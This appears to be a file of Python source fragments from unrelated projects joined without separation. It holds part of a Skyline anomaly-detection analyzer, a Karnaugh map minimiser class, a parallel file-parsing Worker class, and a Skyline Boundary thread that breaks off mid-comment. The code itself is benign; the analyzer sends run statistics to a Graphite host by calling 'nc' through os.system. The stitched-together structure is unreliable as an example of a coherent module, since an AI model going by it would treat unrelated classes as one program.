                timeseries = list(unpacker)

                anomalous, ensemble, datapoint, ts = run_selected_algorithm(timeseries)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    metric = [datapoint, base_name, ts]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except AttributeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Incomplete:
                exceptions['Incomplete'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Collate process-specific dicts to main dicts
        with self.lock:
            for key, value in anomaly_breakdown.items():
                if key not in self.anomaly_breakdown:
                    self.anomaly_breakdown[key] = value
                else:
                    self.anomaly_breakdown[key] += value

            for key, value in exceptions.items():
                if key not in self.exceptions:
                    self.exceptions[key] = value
                else:
                    self.exceptions[key] += value

    def send_mail(self, alert, metric):
        """
        Send an alert email to the appropriate recipient

        :param alert: sequence; ``alert[1]`` is used as recipient and
            ``alert[2]`` as the number of seconds until the next alert
        :param metric: sequence; ``metric[0]`` is the anomalous value and
            ``metric[1]`` the metric name
        """
        msg = MIMEMultipart('alternative')
        msg['Subject'] = '[skyline alert] ' + metric[1]
        msg['From'] = settings.ALERT_SENDER
        msg['To'] = alert[1]
        link = '%s/render/?width=588&height=308&target=%s' % (settings.GRAPHITE_HOST, metric[1])
        body = 'Anomalous value: %s <br> Next alert in: %s seconds <a href="%s"><img src="%s"/></a>' % (metric[0], alert[2], link, link)
        msg.attach(MIMEText(body, 'html'))
        s = SMTP('127.0.0.1')
        try:
            s.sendmail(settings.ALERT_SENDER, alert[1], msg.as_string())
        finally:
            # Close the connection even when sending fails.
            s.quit()

    def run(self):
        """
        Called when the process intializes.

        Loops forever: pings Redis, spawns the worker processes, dumps the
        anomalies to the webapp file, saves and alerts on new anomalies, logs
        statistics and resets the shared containers.
        """
        while True:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except Exception:
                logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
                continue

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Spawn processes
            pids = []
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                p.start()

            # Send wait signal to zombie processes
            for p in pids:
                p.join()

            # One snapshot of the shared list for the rest of this cycle.
            found_metrics = list(self.anomalous_metrics)

            # Write anomalous_metrics to static webapp directory
            filename = path.abspath(path.join(path.dirname( __file__ ), '..', settings.ANOMALY_DUMP))
            with open(filename, 'w') as fh:
                # Make it JSONP with a handle_data() function
                anomalous_metrics = sorted(found_metrics, key=operator.itemgetter(1))
                fh.write('handle_data(%s)' % anomalous_metrics)

            # process anomalous metrics
            for metric in found_metrics:
                try:
                    # Save each (name, timestamp) pair at most once per
                    # SKIP_FREQUENCY seconds.
                    last_save_key = 'last_save.%s.%s' % (metric[1], metric[2])
                    last_save = self.redis_conn.get(last_save_key)
                    if not last_save:
                        self.redis_conn.setex(last_save_key,
                            settings.SKIP_FREQUENCY, packb(metric[0]))
                        self.storage.save(metric)
                    if settings.ENABLE_ALERTS:
                        last_alert_key = 'last_alert.' + metric[1]
                        last_alert = self.redis_conn.get(last_alert_key)
                        if not last_alert:
                            self.redis_conn.setex(last_alert_key,
                                settings.SKIP_FREQUENCY, packb(metric[0]))
                            self.alerter.add(metric)
                except Exception as e:
                    logger.error("Failed processing anomaly, pid: %s, metric: %s, error: %s",
                        getpid(), metric[1], e)

            # send ready alerts
            if settings.ENABLE_ALERTS:
                try:
                    self.alerter.send_alerts()
                except Exception as e:
                    logger.error("Failed sending alerts, error: %s", e)

            # Log progress
            logger.info('seconds to run :: %.2f' % (time() - now))
            logger.info('total metrics :: %d' % len(unique_metrics))
            logger.info('total analyzed :: %d' % (len(unique_metrics) - sum(self.exceptions.values())))
            logger.info('total anomalies :: %d' % len(self.anomalous_metrics))
            logger.info('exception stats :: %s' % self.exceptions)
            logger.info('anomaly breakdown :: %s' % self.anomaly_breakdown)

            # Log to Graphite
            if settings.GRAPHITE_HOST != '':
                host = settings.GRAPHITE_HOST.replace('http://', '')
                system('echo skyline.analyzer.run_time %.2f %s | nc -w 3 %s 2003' % ((time() - now), now, host))
                system('echo skyline.analyzer.total_analyzed %d %s | nc -w 3 %s 2003' % ((len(unique_metrics) - sum(self.exceptions.values())), now, host))

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration :: %.2f' % time_human)
                if settings.GRAPHITE_HOST != '':
                    host = settings.GRAPHITE_HOST.replace('http://', '')
                    system('echo skyline.analyzer.duration %.2f %s | nc -w 3 %s 2003' % (time_human, now, host))
                    system('echo skyline.analyzer.projected %.2f %s | nc -w 3 %s 2003' % (projected, now, host))

            # Reset counters. The existing proxies are emptied in place so no
            # additional manager is started on every cycle.
            self.anomalous_metrics[:] = []
            self.exceptions.clear()
            self.anomaly_breakdown.clear()

            # Sleep if it went too fast
            if time() - now < 5:
                logger.info('sleeping due to low run time...')
                sleep(10)
class KarnaughMap(object):
    """
    Karnaugh map over ``n`` boolean variables with a block-joining solver.

    Cells are addressed as ``(x, y)`` and hold 0, 1 or 2, where 2 marks a
    "don't care" cell. A solution is a list of ``KarnaughNode`` objects whose
    ``values`` hold one entry per variable: 0, 1, or 2 for "either".
    """

    def __init__(self, n, MaxProcess=16384):
        """
        :param n: number of variables of the map
        :param MaxProcess: stored on the instance and printed; the solver in
            this class does not read it
        """
        self.blocks = []
        self.kmap = {}
        self.kmapDCare = {}
        self.kmapValues = {}
        self.MaxProcess = MaxProcess
        print("MaxProcess %d" % MaxProcess)
        self.completion = 0

        # Set number of variables
        self.numberOfVariables = n
        self.numberOfDCares = 0

        # Determine width and height from n. of vars
        self.width = int(pow(2, ceil(n / 2.0)))
        self.height = int(pow(2, floor(n / 2.0)))

        # Fill map with 0s and clear the list of KarnaughNodes
        self.Reset()

        # Fill kmapValues with the value that each cell in the map has.
        # Odd rows run right-to-left. Look here for rules:
        # http://www.allaboutcircuits.com/vol_4/chpt_8/3.html
        if self.numberOfVariables > 2:
            for i in range(self.height):
                for j in range(self.width):
                    if i % 2 == 0:
                        column = j
                    else:
                        column = self.width - 1 - j
                    self.kmapValues[(j, i)] = self.GrayEncode(column + i * self.width)
        elif self.numberOfVariables == 2:
            self.kmapValues[(0, 0)] = 0
            self.kmapValues[(1, 0)] = 1
            self.kmapValues[(0, 1)] = 2
            self.kmapValues[(1, 1)] = 3
        elif self.numberOfVariables == 1:
            self.kmapValues[(0, 0)] = 0
            self.kmapValues[(1, 0)] = 1

    def _cells(self):
        """Yield every (x, y) cell coordinate of the map, row by row."""
        for y in range(self.height):
            for x in range(self.width):
                yield (x, y)

    def Reset(self):
        """
        Fills map with zeros and deletes all nodes from the solution list
        """
        for (x, y) in self._cells():
            self.Set(x, y, 0)
        # A plain list, like everywhere else in this class.
        self.blocks = []

    def Solve(self, completion):
        """
        Solve the map with every "don't care" cell treated as 1.

        The exhaustive search over all don't-care arrangements is disabled,
        so exactly one arrangement is solved and its result is left in
        ``self.blocks``. Note that ``self.kmap`` is overwritten with 1 for
        the don't-care cells.

        :param completion: object whose ``value`` attribute receives the
            progress percentage (see ``Solve2``)
        """
        self.blocks = []
        for cell in self._cells():
            if self.kmapDCare[cell] == 1:
                self.kmap[cell] = 1
        self.Solve2(completion)

    def _join(self, a, candidates):
        """Join ``a`` with every candidate differing in one position; add new blocks."""
        for b in candidates:
            x = self.IsJoinable(a.values, b.values)
            if x > 0:
                # Make a new block with 2 in the place of the one bit where
                # a and b are different.
                n = KarnaughNode()
                n.numberOfItems = a.numberOfItems * 2
                n.flag = False
                for j, bit in enumerate(a.values):
                    if j != (x - 1):
                        n.values.append(bit)
                    else:
                        n.values.append(2)

                # Mark that a node is part of a larger node
                a.flag = True
                b.flag = True

                # Only add the block if it is not in the list yet
                if not any(n.values == c.values for c in self.blocks):
                    self.blocks.append(n)

    def _drop_covered(self, limit):
        """Remove unflagged blocks smaller than ``limit`` that a larger block contains."""
        small = [block for block in self.blocks
                 if block.flag == False and block.numberOfItems < limit]  # noqa: E712
        for a_block in small:
            larger = [block for block in self.blocks
                      if block != a_block and block.numberOfItems > a_block.numberOfItems]
            for b_block in larger:
                covered = True
                for index in range(len(b_block.values)):
                    if (a_block.values[index] != b_block.values[index]
                            and b_block.values[index] != 2):
                        covered = False
                        break
                if covered:
                    self.blocks.remove(a_block)
                    break

    def Solve2(self, completion):
        """
        Build the solution for the current contents of ``self.kmap``.

        Appends to ``self.blocks``: one block per cell holding 1, then
        repeatedly joins equally sized blocks into blocks twice as large,
        and finally removes blocks that are contained in others, cover only
        don't-care cells, or are not needed to reproduce the map.

        :param completion: object whose ``value`` attribute is set to the
            progress percentage while blocks are joined
        """
        cells = list(self._cells())

        # Check for special case that all cells in the map are the same
        first = self.kmap[(0, 0)]
        if all(self.kmap[cell] == first for cell in cells):
            # Clear the list so that all nodes with one item are deleted
            self.blocks = []
            # If there are only zeros in the map there's nothing to solve
            if first == 0:
                return
            # Otherwise the solution is one element as big as the map
            n = KarnaughNode()
            n.numberOfItems = self.width * self.height
            for j in range(self.numberOfVariables):
                n.values.append(2)
            self.blocks.append(n)
            return

        # Put all blocks with 1 element in list
        for (x, y) in cells:
            if self.kmap[(x, y)] == 1:
                n = KarnaughNode()
                n.numberOfItems = 1
                n.flag = False
                n.values = self.GetMapBoolValue(x, y)
                self.blocks.append(n)

        # width * height == 2 ** numberOfVariables, so log2(cells) + 1 is
        # computed exactly here instead of through floating point logs.
        steps = self.numberOfVariables + 1

        # Joining blocks into blocks with 2^sizeloop elements
        for sizeloop in range(1, steps):
            # Check every block with every other block of the same size and
            # see if they can be joined into a bigger block
            candidates = [block for block in self.blocks
                          if block.numberOfItems == 2 ** (sizeloop - 1)]
            for index, a in enumerate(candidates):
                self.completion = int(
                    ((index + 1.0) / len(candidates) / steps
                     + (sizeloop - 1.0) / steps) * 100)
                completion.value = self.completion
                self._join(a, candidates)

            # Drop unjoined blocks that are included in another block
            self._drop_covered(2 ** sizeloop)

        # Deletes nodes that are contained in larger nodes
        for a in [block for block in self.blocks if block.flag == True]:  # noqa: E712
            self.blocks.remove(a)

        # Delete nodes that cover don't-care cells only. Iterate a snapshot:
        # removing from the list being iterated would skip elements.
        for block in list(self.blocks):
            dcare_only = True
            for (x, y) in cells:
                if self.IsAtCell(x, y, block.values):
                    if self.kmapDCare[(x, y)] != 1:
                        dcare_only = False
            if dcare_only:
                self.blocks.remove(block)

        # Deletes unneeded nodes. Draws a temp map with all nodes but one and
        # if that map is same as the main map, the node that wasn't drawn can
        # be deleted. The outer loop walks a snapshot; the inner loop uses
        # the live list so already deleted nodes are no longer drawn.
        for a in list(self.blocks):
            temp = dict((cell, 0) for cell in cells)
            for b in self.blocks:
                if a != b:
                    for (x, y) in cells:
                        if self.IsAtCell(x, y, b.values):
                            temp[(x, y)] = 1
            unneeded = all(
                temp[cell] == self.kmap[cell] or self.kmapDCare[cell] == 1
                for cell in cells)
            if unneeded:
                self.blocks.remove(a)

    def IsAtCell(self, x, y, a):
        """Return 1 if the block values ``a`` cover cell (x, y), otherwise 0."""
        b = self.GetMapBoolValue(x, y)
        for i in range(len(a)):
            if (a[i] != b[i]) and (a[i] != 2):
                return 0
        return 1

    def GetMapBoolValue(self, x, y):
        """
        Return the value of cell (x, y) as a list of bits, most significant
        first, padded with zeros to ``numberOfVariables`` entries.
        """
        b = []
        i = self.GetMapValue(x, y)
        while i > 0:
            b.insert(0, i % 2)
            # Floor division keeps i an integer on every Python version.
            i = i // 2
        for j in range(len(b), self.numberOfVariables):
            b.insert(0, 0)
        return b

    def IsJoinable(self, a, b):
        """
        Checks if 2 karnaugh nodes with values a and b are joinable (only
        differ in one bit), and if they are returns (place where they differ
        + 1), otherwise returns 0
        """
        c = 0
        x = 0
        for i in range(len(a)):
            if a[i] != b[i]:
                c += 1
                x = i
        if c == 1:
            return x + 1
        return 0

    def GrayEncode(self, g):
        """Return the Gray code of ``g``."""
        return int(g) ^ (int(g) >> 1)

    def Set(self, x, y, value):
        """
        Store ``value`` in cell (x, y); the value 2 marks the cell as
        "don't care". ``numberOfDCares`` is kept equal to the number of
        cells currently marked that way.
        """
        was_dcare = self.kmapDCare.get((x, y)) == 1
        self.kmap[(x, y)] = value
        if value == 2:
            self.kmapDCare[(x, y)] = 1
            if not was_dcare:
                self.numberOfDCares += 1
        else:
            self.kmapDCare[(x, y)] = 0
            if was_dcare:
                self.numberOfDCares -= 1

    def Get(self, x, y):
        """Return the value of cell (x, y), or 2 for a "don't care" cell."""
        if not self.kmapDCare[(x, y)]:
            return self.kmap[(x, y)]
        return 2

    def GetMapValue(self, x, y):
        """Return the number assigned to cell (x, y) in ``kmapValues``."""
        return self.kmapValues[(x, y)]

    def GetWidth(self):
        """Return the number of columns of the map."""
        return self.width

    def GetHeight(self):
        """Return the number of rows of the map."""
        return self.height

    def GetSolutions(self):
        """Return the current list of solution blocks."""
        return self.blocks

    def GetNumberOfVars(self):
        """Return the number of variables of the map."""
        return self.numberOfVariables
class Worker(object):
    """
    Split an input file, parse the pieces in parallel processes and write
    the collected entries and error line numbers to an output file.
    """

    def __init__(self, fname, output_file):
        """
        :param fname: path of the input file
        :param output_file: path of the file that ``reducer`` writes
        """
        self.fname = fname
        self.split_files = None
        # Disabled hook: self.db_instance = Utility.tinydb_instance()
        # Manager-backed lists that the parser processes append to.
        self.undefined_list = Manager().list()
        self.defined_list = Manager().list()
        self.lines_to_be = 0
        self.output = {}
        self.opfile = output_file

    def data_process(self):
        """
        Count the lines of the input file and split it.

        The line count and the ``cpu_count()`` value are handed to
        ``Utility.split_files``; its two results are stored in
        ``lines_to_be`` and ``split_files``.

        returns: Nothing
        """
        logging.info('Processing the data and split files')
        total_lines = Utility.file_len(self.fname)
        split_result = Utility.split_files(self.fname, total_lines, cpu_count().real)
        self.lines_to_be, self.split_files = split_result

    def clean_json(self, line_no, row):
        """
        Cheap pre-check that spares the parser obviously malformed rows.

        :param line_no: Line number from the file (not used by the check)
        :param row: the split document; valid rows have 4 or 5 fields
        :return: Boolean
        """
        return len(row) in (4, 5)

    def parse_json(self, fname):
        """
        Parse every row of one split file.

        Values returned by ``ParseDoc.parse_machine`` are appended to
        ``defined_list``; the line numbers of rows that fail the pre-check or
        parse to a falsy value are appended to ``undefined_list``.

        :param fname: split file to read
        :return: Nothing
        """
        reader = DocProcess(fname, self.lines_to_be)
        reader.read_csv()
        parser = ParseDoc()
        for line_no, row in reader.next():
            fields = row.split(',')
            parsed = None
            if self.clean_json(line_no, fields):
                parsed = parser.parse_machine(fields)
            if parsed:
                self.defined_list.append(parsed)
            else:
                self.undefined_list.append(line_no)

    def mapper(self):
        """Start one ``parse_json`` process per split file and wait for all of them."""
        started = []
        for split_name in self.split_files:
            proc = Process(target=self.parse_json, args=(split_name, ))
            started.append(proc)
            proc.start()
        for proc in started:
            proc.join()

    def reducer(self):
        """
        Collect the results into ``self.output`` (entries sorted by
        ``lastname``, errors sorted ascending) and pretty-print it to the
        output file.
        """
        result = self.output
        result["entries"] = list(self.defined_list)
        result["errors"] = list(self.undefined_list)
        result["errors"].sort()
        result["entries"] = sorted(result["entries"], key=itemgetter('lastname'))
        with open(self.opfile, 'w') as out_handle:
            pprint.pprint(result, out_handle, indent=2)

    def run(self):
        """Run ``mapper`` and then ``reducer``."""
        self.mapper()
        self.reducer()
class Boundary(Thread):
    """Daemon thread that analyses metrics against BOUNDARY_METRICS.

    Each pass of run() reads the unique metric names from Redis, keeps the
    ones matching a BOUNDARY_METRICS pattern, fans them out to worker
    processes (spin_process), then sends alerts for the anomalies the
    workers recorded and reports run statistics.
    """

    def __init__(self, parent_pid):
        """
        Initialize the Boundary

        :param parent_pid: pid of the parent process, checked by
            check_if_parent_is_alive
        """
        super(Boundary, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path=REDIS_SOCKET)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.boundary_metrics = Manager().list()
        # Appended to by the spin_process workers, consumed by run()
        self.anomalous_metrics = Manager().list()
        # (key, count) pairs put by the workers, collated by run()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()

    def check_if_parent_is_alive(self):
        """
        Exit if either this process or the parent process cannot be
        signalled (signal 0 only checks that the pid can be signalled).
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except Exception:
            exit(0)

    def unique_noHash(self, seq):
        """
        Return the items of seq with duplicates removed, keeping the first
        occurrence of each. Items are compared by their str() form so that
        unhashable items (e.g. lists) can be handled.

        :param seq: iterable of items
        :return: list of unique items in original order
        """
        seen = set()
        return [x for x in seq if str(x) not in seen and not seen.add(str(x))]

    # This is to make a dump directory in /tmp if ENABLE_BOUNDARY_DEBUG is True
    # for dumping the metric timeseries data into for debugging purposes
    def mkdir_p(self, path):
        """
        Create the directory path, including parents.

        :param path: directory to create
        :return: True if it was created, None if it already existed
        :raises OSError: for any failure other than "already exists"
        """
        try:
            os.makedirs(path)
            return True
        except OSError as exc:
            # Python >2.5
            if not (exc.errno == errno.EEXIST and os.path.isdir(path)):
                raise

    @staticmethod
    def _metric_setting(metric, index, missing=False):
        """
        Read one optional setting from a BOUNDARY_METRICS tuple.

        :param metric: the metric settings tuple
        :param index: position of the setting in the tuple
        :param missing: value to return if the setting cannot be read
            (e.g. the tuple is too short)
        :return: the setting if it is truthy, False if it is falsy,
            ``missing`` if reading it raised
        """
        try:
            if metric[index]:
                return metric[index]
        except Exception:
            return missing
        return False

    def spin_process(self, i, boundary_metrics):
        """
        Assign a bunch of metrics for a process to analyze.

        Anomalies are appended to self.anomalous_metrics; per-process
        exception and anomaly counts are put on self.exceptions_q and
        self.anomaly_breakdown_q for the parent to collate.

        :param i: 1-based number of this process
        :param boundary_metrics: list of [metric_name, algorithm] items
        """
        # Determine assigned metrics
        bp = settings.BOUNDARY_PROCESSES
        bm_range = len(boundary_metrics)
        keys_per_processor = int(ceil(float(bm_range) / float(bp)))
        if i == settings.BOUNDARY_PROCESSES:
            assigned_max = len(boundary_metrics)
        else:
            # This is a skyline bug, the original skyline code uses 1 as the
            # beginning position of the index, python indices begin with 0
            # assigned_max = len(boundary_metrics)
            # This closes the etsy/skyline pull request opened by @languitar on 17 Jun 2014
            # https://github.com/etsy/skyline/pull/94 Fix analyzer worker metric assignment
            assigned_max = min(len(boundary_metrics), i * keys_per_processor)
        assigned_min = (i - 1) * keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics_and_algos = [boundary_metrics[index] for index in assigned_keys]
        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug :: printing assigned_metrics_and_algos')
            for assigned_metric_and_algo in assigned_metrics_and_algos:
                logger.info('debug :: assigned_metric_and_algo - %s' % str(assigned_metric_and_algo))

        # Compile assigned metrics
        assigned_metrics = [metric_and_algo[0] for metric_and_algo in assigned_metrics_and_algos]

        # unique unhashed things
        unique_assigned_metrics = self.unique_noHash(assigned_metrics)

        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug :: unique_assigned_metrics - %s' % str(unique_assigned_metrics))
            logger.info('debug :: printing unique_assigned_metrics:')
            for unique_assigned_metric in unique_assigned_metrics:
                logger.info('debug :: unique_assigned_metric - %s' % str(unique_assigned_metric))

        # Check if this process is unnecessary
        if not unique_assigned_metrics:
            return

        # Multi get series
        try:
            raw_assigned = self.redis_conn.mget(unique_assigned_metrics)
        except Exception:
            logger.error('error :: failed to mget assigned_metrics from redis')
            return

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Reset boundary_algortims
        all_boundary_algorithms = [metric[1] for metric in BOUNDARY_METRICS]

        # The unique algorithms that are being used
        boundary_algorithms = self.unique_noHash(all_boundary_algorithms)
        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug :: boundary_algorithms - %s' % str(boundary_algorithms))

        discover_run_metrics = []

        # Distill metrics into a run list
        for metric_index, metric_name in enumerate(unique_assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug :: unpacking timeseries for %s - %s' % (metric_name, str(metric_index)))
                raw_series = raw_assigned[metric_index]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
            except Exception as e:
                exceptions['Other'] += 1
                logger.error('error :: redis data error: ' + traceback.format_exc())
                # %s, not %e: %e is a float conversion and raises TypeError
                # when given an exception
                logger.error('error :: %s' % e)

            base_name = metric_name.replace(FULL_NAMESPACE, '', 1)

            # Determine the metrics BOUNDARY_METRICS metric tuple settings
            # NOTE(review): the nested loops below append the same settings
            # repeatedly (algo is not used in the body); the duplicates are
            # removed by unique_noHash further down.
            for metrick in BOUNDARY_METRICS:
                CHECK_MATCH_PATTERN = metrick[0]
                check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                pattern_match = check_match_pattern.match(base_name)
                metric_pattern_matched = False
                if pattern_match:
                    metric_pattern_matched = True
                    algo_pattern_matched = False
                    for algo in boundary_algorithms:
                        for metric in BOUNDARY_METRICS:
                            CHECK_MATCH_PATTERN = metric[0]
                            check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                            pattern_match = check_match_pattern.match(base_name)
                            if pattern_match:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: metric and algo pattern MATCHED - " + metric[0] + " | " + base_name + " | " + str(metric[1]))
                                algo_pattern_matched = True
                                algorithm = metric[1]
                                # Every optional setting is read the same
                                # way, so alert_threshold and metric_alerters
                                # are always bound (False when falsy/absent)
                                # rather than left over from a previous tuple.
                                metric_expiration_time = self._metric_setting(metric, 2)
                                metric_min_average = self._metric_setting(metric, 3)
                                metric_min_average_seconds = self._metric_setting(metric, 4, 1200)
                                metric_trigger = self._metric_setting(metric, 5)
                                alert_threshold = self._metric_setting(metric, 6)
                                metric_alerters = self._metric_setting(metric, 7)
                            if metric_pattern_matched and algo_pattern_matched:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info('debug :: added metric - %s, %s, %s, %s, %s, %s, %s, %s, %s' % (str(metric_index), metric_name, str(metric_expiration_time), str(metric_min_average), str(metric_min_average_seconds), str(metric_trigger), str(alert_threshold), metric_alerters, algorithm))
                                discover_run_metrics.append([metric_index, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm])

        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug :: printing discover_run_metrics')
            for discover_run_metric in discover_run_metrics:
                logger.info('debug :: discover_run_metrics - %s' % str(discover_run_metric))
            logger.info('debug :: build unique boundary metrics to analyze')

        # Determine the unique set of metrics to run
        run_metrics = self.unique_noHash(discover_run_metrics)

        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug :: printing run_metrics')
            for run_metric in run_metrics:
                logger.info('debug :: run_metrics - %s' % str(run_metric))

        # Distill timeseries strings and submit to run_selected_algorithm
        for metric_and_algo in run_metrics:
            self.check_if_parent_is_alive()

            try:
                raw_assigned_id = metric_and_algo[0]
                metric_name = metric_and_algo[1]
                base_name = metric_name.replace(FULL_NAMESPACE, '', 1)
                metric_expiration_time = metric_and_algo[2]
                metric_min_average = metric_and_algo[3]
                metric_min_average_seconds = metric_and_algo[4]
                metric_trigger = metric_and_algo[5]
                alert_threshold = metric_and_algo[6]
                metric_alerters = metric_and_algo[7]
                algorithm = metric_and_algo[8]

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug :: unpacking timeseries for %s - %s' % (metric_name, str(raw_assigned_id)))

                raw_series = raw_assigned[raw_assigned_id]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug :: unpacked OK - %s - %s' % (metric_name, str(raw_assigned_id)))

                autoaggregate = False
                autoaggregate_value = 0

                # Determine if the namespace is to be aggregated
                if BOUNDARY_AUTOAGGRERATION:
                    # The result is not reset per pattern: doing so discarded
                    # a match as soon as a later pattern did not match, so
                    # only the last configured pattern could ever apply. The
                    # last matching pattern wins.
                    for autoaggregate_metric in BOUNDARY_AUTOAGGRERATION_METRICS:
                        CHECK_MATCH_PATTERN = autoaggregate_metric[0]
                        check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                        pattern_match = check_match_pattern.match(base_name)
                        if pattern_match:
                            autoaggregate = True
                            autoaggregate_value = autoaggregate_metric[1]

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug :: BOUNDARY_AUTOAGGRERATION passed - %s - %s' % (metric_name, str(autoaggregate)))

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info(
                        'debug :: analysing - %s, %s, %s, %s, %s, %s, %s, %s, %s, %s' % (
                            metric_name, str(metric_expiration_time),
                            str(metric_min_average),
                            str(metric_min_average_seconds),
                            str(metric_trigger), str(alert_threshold),
                            metric_alerters, autoaggregate,
                            autoaggregate_value, algorithm)
                    )
                    # Dump the timeseries data to a file
                    timeseries_dump_dir = "/tmp/skyline/boundary/" + algorithm
                    self.mkdir_p(timeseries_dump_dir)
                    timeseries_dump_file = timeseries_dump_dir + "/" + metric_name + ".json"
                    with open(timeseries_dump_file, 'w+') as f:
                        f.write(str(timeseries))

                # Check if a metric has its own unique BOUNDARY_METRICS alert
                # tuple, this allows us to paint an entire metric namespace with
                # the same brush AND paint a unique metric or namespace with a
                # different brush or scapel
                has_unique_tuple = False
                run_tupple = False
                boundary_metric_tuple = (base_name, algorithm, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters)
                wildcard_namespace = True
                for metric_tuple in BOUNDARY_METRICS:
                    if not has_unique_tuple:
                        CHECK_MATCH_PATTERN = metric_tuple[0]
                        check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                        pattern_match = check_match_pattern.match(base_name)
                        if pattern_match:
                            if metric_tuple[0] == base_name:
                                wildcard_namespace = False
                            if not has_unique_tuple:
                                if boundary_metric_tuple == metric_tuple:
                                    has_unique_tuple = True
                                    run_tupple = True
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info('unique_tuple:')
                                        logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple))
                                        logger.info('metric_tuple: %s' % str(metric_tuple))

                if not has_unique_tuple:
                    if wildcard_namespace:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('wildcard_namespace:')
                            logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple))
                        run_tupple = True
                    else:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('wildcard_namespace: BUT WOULD NOT RUN')
                            logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple))

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('WOULD RUN run_selected_algorithm = %s' % run_tupple)

                if run_tupple:
                    # Submit the timeseries and settings to run_selected_algorithm
                    anomalous, ensemble, datapoint, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm = run_selected_algorithm(
                        timeseries, metric_name,
                        metric_expiration_time,
                        metric_min_average,
                        metric_min_average_seconds,
                        metric_trigger,
                        alert_threshold,
                        metric_alerters,
                        autoaggregate,
                        autoaggregate_value,
                        algorithm
                    )
                    if ENABLE_BOUNDARY_DEBUG:
                        logger.info('debug :: analysed - %s' % (metric_name))
                else:
                    anomalous = False
                    if ENABLE_BOUNDARY_DEBUG:
                        logger.info('debug :: more unique metric tuple not analysed - %s' % (metric_name))

                # If it's anomalous, add it to list
                if anomalous:
                    anomalous_metric = [datapoint, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm]
                    self.anomalous_metrics.append(anomalous_metric)
                    # Get the anomaly breakdown - who returned True?
                    triggered_algorithms = []
                    for index, value in enumerate(ensemble):
                        if value:
                            anomaly_breakdown[algorithm] += 1
                            triggered_algorithms.append(algorithm)

                    # If Crucible or Panorama are enabled determine details
                    determine_anomaly_details = False
                    if settings.ENABLE_CRUCIBLE and settings.BOUNDARY_CRUCIBLE_ENABLED:
                        determine_anomaly_details = True
                    if settings.PANORAMA_ENABLED:
                        determine_anomaly_details = True

                    if determine_anomaly_details:
                        metric_timestamp = str(int(timeseries[-1][0]))
                        from_timestamp = str(int(timeseries[1][0]))
                        timeseries_dir = base_name.replace('.', '/')

                    # If Panorama is enabled - create a Panorama check
                    if settings.PANORAMA_ENABLED:
                        # Note:
                        # The values are enclosed in single quotes intentionally
                        # as the imp.load_source used results in a shift in the
                        # decimal position when double quoted, e.g.
                        # value = "5622.0" gets imported as
